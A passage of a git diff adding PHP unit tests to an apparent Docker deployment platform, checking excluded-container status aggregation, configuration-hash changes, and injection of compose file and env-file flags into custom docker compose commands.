$this->getExcludedContainersFromDockerCompose($dockerComposeRaw);'); +}); + +it('ensures GetContainersStatus calculates excluded status for applications', function () { + $getContainersStatusFile = file_get_contents(__DIR__.'/../../app/Actions/Docker/GetContainersStatus.php'); + + // In aggregateApplicationStatus, verify the all-excluded scenario returns status + expect($getContainersStatusFile) + ->toContain('if ($relevantStatuses->isEmpty()) {') + ->toContain('return $this->calculateExcludedStatusFromStrings($containerStatuses);'); +}); + +it('ensures GetContainersStatus calculates excluded status for services', function () { + $getContainersStatusFile = file_get_contents(__DIR__.'/../../app/Actions/Docker/GetContainersStatus.php'); + + // In aggregateServiceContainerStatuses, verify the all-excluded scenario updates status + expect($getContainersStatusFile) + ->toContain('$aggregatedStatus = $this->calculateExcludedStatusFromStrings($containerStatuses);') + ->toContain('if ($aggregatedStatus) {') + ->toContain('$statusFromDb = $subResource->status;') + ->toContain("if (\$statusFromDb !== \$aggregatedStatus) {\n \$subResource->update(['status' => \$aggregatedStatus]);"); +}); + +it('ensures excluded status format is consistent across all paths', function () { + $traitFile = file_get_contents(__DIR__.'/../../app/Traits/CalculatesExcludedStatus.php'); + + // Trait now delegates to ContainerStatusAggregator and uses appendExcludedSuffix helper + expect($traitFile) + ->toContain('use App\\Services\\ContainerStatusAggregator;') + ->toContain('$aggregator = new ContainerStatusAggregator;') + ->toContain('private function appendExcludedSuffix(string $status): string'); + + // Check that appendExcludedSuffix returns consistent colon format with :excluded suffix + expect($traitFile) + ->toContain("return 'degraded:excluded';") + ->toContain("return 'paused:excluded';") + ->toContain("return 'starting:excluded';") + ->toContain("return 'exited';") + ->toContain('return "$status:excluded";'); // For running:healthy:excluded, running:unhealthy:excluded, etc. +}); + +it('ensures all three paths check for exclude_from_hc flag consistently', function () { + // All three should use the trait helper method + $complexStatusCheckFile = file_get_contents(__DIR__.'/../../app/Actions/Shared/ComplexStatusCheck.php'); + $pushServerUpdateJobFile = file_get_contents(__DIR__.'/../../app/Jobs/PushServerUpdateJob.php'); + $getContainersStatusFile = file_get_contents(__DIR__.'/../../app/Actions/Docker/GetContainersStatus.php'); + + expect($complexStatusCheckFile) + ->toContain('$excludedContainers = $this->getExcludedContainersFromDockerCompose($dockerComposeRaw);'); + + expect($pushServerUpdateJobFile) + ->toContain('$excludedContainers = $this->getExcludedContainersFromDockerCompose($dockerComposeRaw);'); + + expect($getContainersStatusFile) + ->toContain('$excludedContainers = $this->getExcludedContainersFromDockerCompose($dockerComposeRaw);'); + + // The trait method should check both exclude_from_hc and restart: no + $traitFile = file_get_contents(__DIR__.'/../../app/Traits/CalculatesExcludedStatus.php'); + expect($traitFile) + ->toContain('$excludeFromHc = data_get($serviceConfig, \'exclude_from_hc\', false);') + ->toContain('$restartPolicy = data_get($serviceConfig, \'restart\', \'always\');') + ->toContain('if ($excludeFromHc || $restartPolicy === \'no\') {'); +}); + +it('ensures calculateExcludedStatus uses ContainerStatusAggregator', function () { + $traitFile = file_get_contents(__DIR__.'/../../app/Traits/CalculatesExcludedStatus.php'); + + // Check that the trait uses ContainerStatusAggregator service instead of duplicating logic + expect($traitFile) + ->toContain('protected function calculateExcludedStatus(Collection $containers, Collection $excludedContainers): string') + ->toContain('use App\Services\ContainerStatusAggregator;') + ->toContain('$aggregator = new ContainerStatusAggregator;') + ->toContain('$aggregator->aggregateFromContainers($excludedOnly)'); + + // Check that it has appendExcludedSuffix helper for all states + expect($traitFile) + ->toContain('private function appendExcludedSuffix(string $status): string') + ->toContain("return 'degraded:excluded';") + ->toContain("return 'paused:excluded';") + ->toContain("return 'starting:excluded';") + ->toContain("return 'exited';") + ->toContain('return "$status:excluded";'); // For running:healthy:excluded +}); + +it('ensures calculateExcludedStatusFromStrings uses ContainerStatusAggregator', function () { + $traitFile = file_get_contents(__DIR__.'/../../app/Traits/CalculatesExcludedStatus.php'); + + // Check that the trait uses ContainerStatusAggregator service instead of duplicating logic + expect($traitFile) + ->toContain('protected function calculateExcludedStatusFromStrings(Collection $containerStatuses): string') + ->toContain('use App\Services\ContainerStatusAggregator;') + ->toContain('$aggregator = new ContainerStatusAggregator;') + ->toContain('$aggregator->aggregateFromStrings($containerStatuses)'); + + // Check that it has appendExcludedSuffix helper for all states + expect($traitFile) + ->toContain('private function appendExcludedSuffix(string $status): string') + ->toContain("return 'degraded:excluded';") + ->toContain("return 'paused:excluded';") + ->toContain("return 'starting:excluded';") + ->toContain("return 'exited';") + ->toContain('return "$status:excluded";'); // For running:healthy:excluded +}); + +it('verifies no code path skips update when all containers excluded', function () { + $pushServerUpdateJobFile = file_get_contents(__DIR__.'/../../app/Jobs/PushServerUpdateJob.php'); + $getContainersStatusFile = file_get_contents(__DIR__.'/../../app/Actions/Docker/GetContainersStatus.php'); + + // These patterns should NOT exist anymore (old behavior that caused drift) + expect($pushServerUpdateJobFile) + ->not->toContain("// If all containers are excluded, don't update status"); + + expect($getContainersStatusFile) + ->not->toContain("// If all containers are excluded, don't update status"); + + // Instead, both should calculate excluded status + expect($pushServerUpdateJobFile) + ->toContain('// If all containers are excluded, calculate status from excluded containers'); + + expect($getContainersStatusFile) + ->toContain('// If all containers are excluded, calculate status from excluded containers'); +}); diff --git a/tests/Unit/ApplicationConfigurationChangeTest.php b/tests/Unit/ApplicationConfigurationChangeTest.php index 618f3d033..8ad88280b 100644 --- a/tests/Unit/ApplicationConfigurationChangeTest.php +++ b/tests/Unit/ApplicationConfigurationChangeTest.php @@ -15,3 +15,35 @@ ->and($hash1)->not->toBe($hash3) ->and($hash2)->not->toBe($hash3); }); + +/** + * Unit test to verify that inject_build_args_to_dockerfile is included in configuration change detection. + * Tests the behavior of the isConfigurationChanged method by verifying that different + * inject_build_args_to_dockerfile values produce different configuration hashes. + */ +it('different inject_build_args_to_dockerfile values produce different hashes', function () { + // Test that the hash calculation includes inject_build_args_to_dockerfile by computing hashes with different values + // true becomes '1', false becomes '', so they produce different hashes + $hash1 = md5(base64_encode('test'.true)); // 'test1' + $hash2 = md5(base64_encode('test'.false)); // 'test' + $hash3 = md5(base64_encode('test')); // 'test' + + expect($hash1)->not->toBe($hash2) + ->and($hash2)->toBe($hash3); // false and empty string produce the same result +}); + +/** + * Unit test to verify that include_source_commit_in_build is included in configuration change detection. + * Tests the behavior of the isConfigurationChanged method by verifying that different + * include_source_commit_in_build values produce different configuration hashes. + */ +it('different include_source_commit_in_build values produce different hashes', function () { + // Test that the hash calculation includes include_source_commit_in_build by computing hashes with different values + // true becomes '1', false becomes '', so they produce different hashes + $hash1 = md5(base64_encode('test'.true)); // 'test1' + $hash2 = md5(base64_encode('test'.false)); // 'test' + $hash3 = md5(base64_encode('test')); // 'test' + + expect($hash1)->not->toBe($hash2) + ->and($hash2)->toBe($hash3); // false and empty string produce the same result +}); diff --git a/tests/Unit/ApplicationDeploymentCustomBuildCommandTest.php b/tests/Unit/ApplicationDeploymentCustomBuildCommandTest.php new file mode 100644 index 000000000..fc29f19c3 --- /dev/null +++ b/tests/Unit/ApplicationDeploymentCustomBuildCommandTest.php @@ -0,0 +1,617 @@ +toBe('docker compose --env-file /artifacts/build-time.env -f ./docker-compose.yaml build'); + expect($customCommand)->toContain('--env-file /artifacts/build-time.env'); +}); + +it('does not duplicate --env-file flag when already present', function () { + $customCommand = 'docker compose --env-file /custom/.env -f ./docker-compose.yaml build'; + + // Simulate the injection logic from ApplicationDeploymentJob + if (! str_contains($customCommand, '--env-file')) { + $customCommand = str_replace( + 'docker compose', + 'docker compose --env-file /artifacts/build-time.env', + $customCommand + ); + } + + expect($customCommand)->toBe('docker compose --env-file /custom/.env -f ./docker-compose.yaml build'); + expect(substr_count($customCommand, '--env-file'))->toBe(1); +}); + +it('preserves custom build command structure with env-file injection', function () { + $customCommand = 'docker compose -f ./custom/path/docker-compose.prod.yaml build --no-cache'; + + // Simulate the injection logic from ApplicationDeploymentJob + if (! str_contains($customCommand, '--env-file')) { + $customCommand = str_replace( + 'docker compose', + 'docker compose --env-file /artifacts/build-time.env', + $customCommand + ); + } + + expect($customCommand)->toBe('docker compose --env-file /artifacts/build-time.env -f ./custom/path/docker-compose.prod.yaml build --no-cache'); + expect($customCommand)->toContain('--env-file /artifacts/build-time.env'); + expect($customCommand)->toContain('-f ./custom/path/docker-compose.prod.yaml'); + expect($customCommand)->toContain('build --no-cache'); +}); + +it('handles multiple docker compose commands in custom build command', function () { + // Edge case: Only the first 'docker compose' should get the env-file flag + $customCommand = 'docker compose -f ./docker-compose.yaml build'; + + // Simulate the injection logic from ApplicationDeploymentJob + if (! str_contains($customCommand, '--env-file')) { + $customCommand = str_replace( + 'docker compose', + 'docker compose --env-file /artifacts/build-time.env', + $customCommand + ); + } + + // Note: str_replace replaces ALL occurrences, which is acceptable in this case + // since you typically only have one 'docker compose' command + expect($customCommand)->toContain('docker compose --env-file /artifacts/build-time.env'); +}); + +it('verifies build args would be appended correctly', function () { + $customCommand = 'docker compose --env-file /artifacts/build-time.env -f ./docker-compose.yaml build'; + $buildArgs = collect([ + '--build-arg NODE_ENV=production', + '--build-arg API_URL=https://api.example.com', + ]); + + // Simulate build args appending logic + $buildArgsString = $buildArgs->implode(' '); + $buildArgsString = str_replace("'", "'\\''", $buildArgsString); + $customCommand .= " {$buildArgsString}"; + + expect($customCommand)->toContain('--build-arg NODE_ENV=production'); + expect($customCommand)->toContain('--build-arg API_URL=https://api.example.com'); + expect($customCommand)->toBe( + 'docker compose --env-file /artifacts/build-time.env -f ./docker-compose.yaml build --build-arg NODE_ENV=production --build-arg API_URL=https://api.example.com' + ); +}); + +it('properly escapes single quotes in build args', function () { + $buildArg = "--build-arg MESSAGE='Hello World'"; + + // Simulate the escaping logic from ApplicationDeploymentJob + $escapedBuildArg = str_replace("'", "'\\''", $buildArg); + + expect($escapedBuildArg)->toBe("--build-arg MESSAGE='\\''Hello World'\\''"); +}); + +it('handles DOCKER_BUILDKIT prefix with env-file injection', function () { + $customCommand = 'docker compose -f ./docker-compose.yaml build'; + + // Simulate the injection logic from ApplicationDeploymentJob + if (! str_contains($customCommand, '--env-file')) { + $customCommand = str_replace( + 'docker compose', + 'docker compose --env-file /artifacts/build-time.env', + $customCommand + ); + } + + // Simulate BuildKit support + $dockerBuildkitSupported = true; + if ($dockerBuildkitSupported) { + $customCommand = "DOCKER_BUILDKIT=1 {$customCommand}"; + } + + expect($customCommand)->toBe('DOCKER_BUILDKIT=1 docker compose --env-file /artifacts/build-time.env -f ./docker-compose.yaml build'); + expect($customCommand)->toStartWith('DOCKER_BUILDKIT=1'); + expect($customCommand)->toContain('--env-file /artifacts/build-time.env'); +}); + +// Tests for -f flag injection + +it('injects -f flag with compose file path into custom build command', function () { + $customCommand = 'docker compose build'; + $composeFilePath = '/artifacts/deployment-uuid/backend/docker-compose.yaml'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, $composeFilePath, '/artifacts/build-time.env'); + + expect($customCommand)->toBe('docker compose -f /artifacts/deployment-uuid/backend/docker-compose.yaml --env-file /artifacts/build-time.env build'); + expect($customCommand)->toContain('-f /artifacts/deployment-uuid/backend/docker-compose.yaml'); + expect($customCommand)->toContain('--env-file /artifacts/build-time.env'); +}); + +it('does not duplicate -f flag when already present', function () { + $customCommand = 'docker compose -f ./custom/docker-compose.yaml build'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + expect($customCommand)->toBe('docker compose --env-file /artifacts/build-time.env -f ./custom/docker-compose.yaml build'); + expect(substr_count($customCommand, ' -f '))->toBe(1); + expect($customCommand)->toContain('--env-file /artifacts/build-time.env'); +}); + +it('does not duplicate --file flag when already present', function () { + $customCommand = 'docker compose --file ./custom/docker-compose.yaml build'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + expect($customCommand)->toBe('docker compose --env-file /artifacts/build-time.env --file ./custom/docker-compose.yaml build'); + expect(substr_count($customCommand, '--file '))->toBe(1); + expect($customCommand)->toContain('--env-file /artifacts/build-time.env'); +}); + +it('injects both -f and --env-file flags in single operation', function () { + $customCommand = 'docker compose build --no-cache'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/uuid/app/docker-compose.prod.yaml', '/artifacts/build-time.env'); + + expect($customCommand)->toBe('docker compose -f /artifacts/uuid/app/docker-compose.prod.yaml --env-file /artifacts/build-time.env build --no-cache'); + expect($customCommand)->toContain('-f /artifacts/uuid/app/docker-compose.prod.yaml'); + expect($customCommand)->toContain('--env-file /artifacts/build-time.env'); + expect($customCommand)->toContain('build --no-cache'); +}); + +it('respects user-provided -f and --env-file flags', function () { + $customCommand = 'docker compose -f ./my-compose.yaml --env-file .env build'; + + // Use the helper function - should not inject anything since both flags are already present + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + expect($customCommand)->toBe('docker compose -f ./my-compose.yaml --env-file .env build'); + expect(substr_count($customCommand, ' -f '))->toBe(1); + expect(substr_count($customCommand, '--env-file'))->toBe(1); +}); + +// Tests for custom start command -f and --env-file injection + +it('injects -f and --env-file flags into custom start command', function () { + $customCommand = 'docker compose up -d'; + $serverWorkdir = '/var/lib/docker/volumes/coolify-data/_data/applications/app-uuid'; + $composeLocation = '/docker-compose.yaml'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, "{$serverWorkdir}{$composeLocation}", "{$serverWorkdir}/.env"); + + expect($customCommand)->toBe('docker compose -f /var/lib/docker/volumes/coolify-data/_data/applications/app-uuid/docker-compose.yaml --env-file /var/lib/docker/volumes/coolify-data/_data/applications/app-uuid/.env up -d'); + expect($customCommand)->toContain('-f /var/lib/docker/volumes/coolify-data/_data/applications/app-uuid/docker-compose.yaml'); + expect($customCommand)->toContain('--env-file /var/lib/docker/volumes/coolify-data/_data/applications/app-uuid/.env'); +}); + +it('does not duplicate -f flag in start command when already present', function () { + $customCommand = 'docker compose -f ./custom-compose.yaml up -d'; + $serverWorkdir = '/var/lib/docker/volumes/coolify-data/_data/applications/app-uuid'; + $composeLocation = '/docker-compose.yaml'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, "{$serverWorkdir}{$composeLocation}", "{$serverWorkdir}/.env"); + + expect($customCommand)->toBe('docker compose --env-file /var/lib/docker/volumes/coolify-data/_data/applications/app-uuid/.env -f ./custom-compose.yaml up -d'); + expect(substr_count($customCommand, ' -f '))->toBe(1); + expect($customCommand)->toContain('--env-file'); +}); + +it('does not duplicate --env-file flag in start command when already present', function () { + $customCommand = 'docker compose --env-file ./my.env up -d'; + $serverWorkdir = '/var/lib/docker/volumes/coolify-data/_data/applications/app-uuid'; + $composeLocation = '/docker-compose.yaml'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, "{$serverWorkdir}{$composeLocation}", "{$serverWorkdir}/.env"); + + expect($customCommand)->toBe('docker compose -f /var/lib/docker/volumes/coolify-data/_data/applications/app-uuid/docker-compose.yaml --env-file ./my.env up -d'); + expect(substr_count($customCommand, '--env-file'))->toBe(1); + expect($customCommand)->toContain('-f'); +}); + +it('respects both user-provided flags in start command', function () { + $customCommand = 'docker compose -f ./my-compose.yaml --env-file ./.env up -d'; + $serverWorkdir = '/var/lib/docker/volumes/coolify-data/_data/applications/app-uuid'; + $composeLocation = '/docker-compose.yaml'; + + // Use the helper function - should not inject anything since both flags are already present + $customCommand = injectDockerComposeFlags($customCommand, "{$serverWorkdir}{$composeLocation}", "{$serverWorkdir}/.env"); + + expect($customCommand)->toBe('docker compose -f ./my-compose.yaml --env-file ./.env up -d'); + expect(substr_count($customCommand, ' -f '))->toBe(1); + expect(substr_count($customCommand, '--env-file'))->toBe(1); +}); + +it('injects both flags in start command with additional parameters', function () { + $customCommand = 'docker compose up -d --remove-orphans'; + $serverWorkdir = '/workdir/app'; + $composeLocation = '/backend/docker-compose.prod.yaml'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, "{$serverWorkdir}{$composeLocation}", "{$serverWorkdir}/.env"); + + expect($customCommand)->toBe('docker compose -f /workdir/app/backend/docker-compose.prod.yaml --env-file /workdir/app/.env up -d --remove-orphans'); + expect($customCommand)->toContain('-f /workdir/app/backend/docker-compose.prod.yaml'); + expect($customCommand)->toContain('--env-file /workdir/app/.env'); + expect($customCommand)->toContain('--remove-orphans'); +}); + +// Security tests: Prevent bypass vectors for flag detection + +it('detects -f flag with equals sign format (bypass vector)', function () { + $customCommand = 'docker compose -f=./custom/docker-compose.yaml build'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Should NOT inject -f flag since -f= is already present + expect($customCommand)->toBe('docker compose --env-file /artifacts/build-time.env -f=./custom/docker-compose.yaml build'); + expect($customCommand)->not->toContain('-f /artifacts/deployment-uuid/docker-compose.yaml'); + expect($customCommand)->toContain('--env-file /artifacts/build-time.env'); +}); + +it('detects --file flag with equals sign format (bypass vector)', function () { + $customCommand = 'docker compose --file=./custom/docker-compose.yaml build'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Should NOT inject -f flag since --file= is already present + expect($customCommand)->toBe('docker compose --env-file /artifacts/build-time.env --file=./custom/docker-compose.yaml build'); + expect($customCommand)->not->toContain('-f /artifacts/deployment-uuid/docker-compose.yaml'); + expect($customCommand)->toContain('--env-file /artifacts/build-time.env'); +}); + +it('detects --env-file flag with equals sign format (bypass vector)', function () { + $customCommand = 'docker compose --env-file=./custom/.env build'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Should NOT inject --env-file flag since --env-file= is already present + expect($customCommand)->toBe('docker compose -f /artifacts/deployment-uuid/docker-compose.yaml --env-file=./custom/.env build'); + expect($customCommand)->toContain('-f /artifacts/deployment-uuid/docker-compose.yaml'); + expect($customCommand)->not->toContain('--env-file /artifacts/build-time.env'); +}); + +it('detects -f flag with tab character whitespace (bypass vector)', function () { + $customCommand = "docker compose\t-f\t./custom/docker-compose.yaml build"; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Should NOT inject -f flag since -f with tab is already present + expect($customCommand)->toBe("docker compose --env-file /artifacts/build-time.env\t-f\t./custom/docker-compose.yaml build"); + expect($customCommand)->not->toContain('-f /artifacts/deployment-uuid/docker-compose.yaml'); + expect($customCommand)->toContain('--env-file /artifacts/build-time.env'); +}); + +it('detects --env-file flag with tab character whitespace (bypass vector)', function () { + $customCommand = "docker compose\t--env-file\t./custom/.env build"; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Should NOT inject --env-file flag since --env-file with tab is already present + expect($customCommand)->toBe("docker compose -f /artifacts/deployment-uuid/docker-compose.yaml\t--env-file\t./custom/.env build"); + expect($customCommand)->toContain('-f /artifacts/deployment-uuid/docker-compose.yaml'); + expect($customCommand)->not->toContain('--env-file /artifacts/build-time.env'); +}); + +it('detects -f flag with multiple spaces (bypass vector)', function () { + $customCommand = 'docker compose -f ./custom/docker-compose.yaml build'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Should NOT inject -f flag since -f with multiple spaces is already present + expect($customCommand)->toBe('docker compose --env-file /artifacts/build-time.env -f ./custom/docker-compose.yaml build'); + expect($customCommand)->not->toContain('-f /artifacts/deployment-uuid/docker-compose.yaml'); + expect($customCommand)->toContain('--env-file /artifacts/build-time.env'); +}); + +it('detects --file flag with multiple spaces (bypass vector)', function () { + $customCommand = 'docker compose --file ./custom/docker-compose.yaml build'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Should NOT inject -f flag since --file with multiple spaces is already present + expect($customCommand)->toBe('docker compose --env-file /artifacts/build-time.env --file ./custom/docker-compose.yaml build'); + expect($customCommand)->not->toContain('-f /artifacts/deployment-uuid/docker-compose.yaml'); + expect($customCommand)->toContain('--env-file /artifacts/build-time.env'); +}); + +it('detects -f flag at start of command (edge case)', function () { + $customCommand = '-f ./custom/docker-compose.yaml docker compose build'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Should NOT inject -f flag since -f is at start of command + expect($customCommand)->toBe('-f ./custom/docker-compose.yaml docker compose --env-file /artifacts/build-time.env build'); + expect($customCommand)->not->toContain('-f /artifacts/deployment-uuid/docker-compose.yaml'); + expect($customCommand)->toContain('--env-file /artifacts/build-time.env'); +}); + +it('detects --env-file flag at start of command (edge case)', function () { + $customCommand = '--env-file=./custom/.env docker compose build'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Should NOT inject --env-file flag since --env-file is at start of command + expect($customCommand)->toBe('--env-file=./custom/.env docker compose -f /artifacts/deployment-uuid/docker-compose.yaml build'); + expect($customCommand)->toContain('-f /artifacts/deployment-uuid/docker-compose.yaml'); + expect($customCommand)->not->toContain('--env-file /artifacts/build-time.env'); +}); + +it('handles mixed whitespace correctly (comprehensive test)', function () { + $customCommand = "docker compose\t-f=./custom/docker-compose.yaml --env-file\t./custom/.env build"; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Should NOT inject any flags since both are already present with various whitespace + expect($customCommand)->toBe("docker compose\t-f=./custom/docker-compose.yaml --env-file\t./custom/.env build"); + expect($customCommand)->not->toContain('-f /artifacts/deployment-uuid/docker-compose.yaml'); + expect($customCommand)->not->toContain('--env-file /artifacts/build-time.env'); +}); + +// Tests for concatenated -f flag format (no space, no equals) + +it('detects -f flag in concatenated format -fvalue (bypass vector)', function () { + $customCommand = 'docker compose -f./custom/docker-compose.yaml build'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Should NOT inject -f flag since -f is concatenated with value + expect($customCommand)->toBe('docker compose --env-file /artifacts/build-time.env -f./custom/docker-compose.yaml build'); + expect($customCommand)->not->toContain('-f /artifacts/deployment-uuid/docker-compose.yaml'); + expect($customCommand)->toContain('--env-file /artifacts/build-time.env'); +}); + +it('detects -f flag concatenated with path containing slash', function () { + $customCommand = 'docker compose -f/path/to/compose.yml up -d'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Should NOT inject -f flag since -f is concatenated + expect($customCommand)->toBe('docker compose --env-file /artifacts/build-time.env -f/path/to/compose.yml up -d'); + expect($customCommand)->not->toContain('-f /artifacts/deployment-uuid/docker-compose.yaml'); + expect($customCommand)->toContain('-f/path/to/compose.yml'); +}); + +it('detects -f flag concatenated at start of command', function () { + $customCommand = '-f./compose.yaml docker compose build'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Should NOT inject -f flag since -f is already present (even at start) + expect($customCommand)->toBe('-f./compose.yaml docker compose --env-file /artifacts/build-time.env build'); + expect($customCommand)->not->toContain('-f /artifacts/deployment-uuid/docker-compose.yaml'); +}); + +it('detects concatenated -f flag with relative path', function () { + $customCommand = 'docker compose -f../docker-compose.prod.yaml build --no-cache'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Should NOT inject -f flag + expect($customCommand)->toBe('docker compose --env-file /artifacts/build-time.env -f../docker-compose.prod.yaml build --no-cache'); + expect($customCommand)->not->toContain('-f /artifacts/deployment-uuid/docker-compose.yaml'); + expect($customCommand)->toContain('-f../docker-compose.prod.yaml'); +}); + +it('correctly injects when no -f flag is present (sanity check after concatenated fix)', function () { + $customCommand = 'docker compose build --no-cache'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/deployment-uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // SHOULD inject both flags + expect($customCommand)->toBe('docker compose -f /artifacts/deployment-uuid/docker-compose.yaml --env-file /artifacts/build-time.env build --no-cache'); + expect($customCommand)->toContain('-f /artifacts/deployment-uuid/docker-compose.yaml'); + expect($customCommand)->toContain('--env-file /artifacts/build-time.env'); +}); + +// Edge case tests: First occurrence only replacement + +it('only replaces first docker compose occurrence in chained commands', function () { + $customCommand = 'docker compose pull && docker compose build'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Only the FIRST 'docker compose' should get the flags + expect($customCommand)->toBe('docker compose -f /artifacts/uuid/docker-compose.yaml --env-file /artifacts/build-time.env pull && docker compose build'); + expect($customCommand)->toContain('docker compose -f /artifacts/uuid/docker-compose.yaml --env-file /artifacts/build-time.env pull'); + expect($customCommand)->toContain(' && docker compose build'); + // Verify the second occurrence is NOT modified + expect(substr_count($customCommand, '-f /artifacts/uuid/docker-compose.yaml'))->toBe(1); + expect(substr_count($customCommand, '--env-file /artifacts/build-time.env'))->toBe(1); +}); + +it('does not modify docker compose string in echo statements', function () { + $customCommand = 'docker compose build && echo "docker compose finished successfully"'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Only the FIRST 'docker compose' (the command) should get flags, NOT the echo message + expect($customCommand)->toBe('docker compose -f /artifacts/uuid/docker-compose.yaml --env-file /artifacts/build-time.env build && echo "docker compose finished successfully"'); + expect($customCommand)->toContain('docker compose -f /artifacts/uuid/docker-compose.yaml --env-file /artifacts/build-time.env build'); + expect($customCommand)->toContain('echo "docker compose finished successfully"'); + // Verify echo message is NOT modified + expect(substr_count($customCommand, 'docker compose', 0))->toBe(2); // Two total occurrences + expect(substr_count($customCommand, '-f /artifacts/uuid/docker-compose.yaml'))->toBe(1); // Only first has flags +}); + +it('does not modify docker compose string in bash comments', function () { + $customCommand = 'docker compose build # This runs docker compose to build the image'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // Only the FIRST 'docker compose' (the command) should get flags, NOT the comment + expect($customCommand)->toBe('docker compose -f /artifacts/uuid/docker-compose.yaml --env-file /artifacts/build-time.env build # This runs docker compose to build the image'); + expect($customCommand)->toContain('docker compose -f /artifacts/uuid/docker-compose.yaml --env-file /artifacts/build-time.env build'); + expect($customCommand)->toContain('# This runs docker compose to build the image'); + // Verify comment is NOT modified + expect(substr_count($customCommand, 'docker compose', 0))->toBe(2); // Two total occurrences + expect(substr_count($customCommand, '-f /artifacts/uuid/docker-compose.yaml'))->toBe(1); // Only first has flags +}); + +// False positive prevention tests: Flags like -foo, -from, -feature should NOT be detected as -f + +it('injects -f flag when command contains -foo flag (not -f)', function () { + $customCommand = 'docker compose build --foo bar'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // SHOULD inject -f flag because -foo is NOT the -f flag + expect($customCommand)->toBe('docker compose -f /artifacts/uuid/docker-compose.yaml --env-file /artifacts/build-time.env build --foo bar'); + expect($customCommand)->toContain('-f /artifacts/uuid/docker-compose.yaml'); +}); + +it('injects -f flag when command contains --from flag (not -f)', function () { + $customCommand = 'docker compose build --from cache-image'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // SHOULD inject -f flag because --from is NOT the -f flag + expect($customCommand)->toBe('docker compose -f /artifacts/uuid/docker-compose.yaml --env-file /artifacts/build-time.env build --from cache-image'); + expect($customCommand)->toContain('-f /artifacts/uuid/docker-compose.yaml'); +}); + +it('injects -f flag when command contains -feature flag (not -f)', function () { + $customCommand = 'docker compose build -feature test'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // SHOULD inject -f flag because -feature is NOT the -f flag + expect($customCommand)->toBe('docker compose -f /artifacts/uuid/docker-compose.yaml --env-file /artifacts/build-time.env build -feature test'); + expect($customCommand)->toContain('-f /artifacts/uuid/docker-compose.yaml'); +}); + +it('injects -f flag when command contains -fast flag (not -f)', function () { + $customCommand = 'docker compose build -fast'; + + // Use the helper function + $customCommand = injectDockerComposeFlags($customCommand, '/artifacts/uuid/docker-compose.yaml', '/artifacts/build-time.env'); + + // SHOULD inject -f flag because -fast is NOT the -f flag + expect($customCommand)->toBe('docker compose -f /artifacts/uuid/docker-compose.yaml --env-file /artifacts/build-time.env build -fast'); + expect($customCommand)->toContain('-f /artifacts/uuid/docker-compose.yaml'); +}); + +// Path normalization tests for preview methods + +it('normalizes path when baseDirectory is root slash', function () { + $baseDirectory = '/'; + $composeLocation = '/docker-compose.yaml'; + + // Normalize baseDirectory to prevent double slashes + $normalizedBase = $baseDirectory === '/' ? '' : rtrim($baseDirectory, '/'); + $path = ".{$normalizedBase}{$composeLocation}"; + + expect($path)->toBe('./docker-compose.yaml'); + 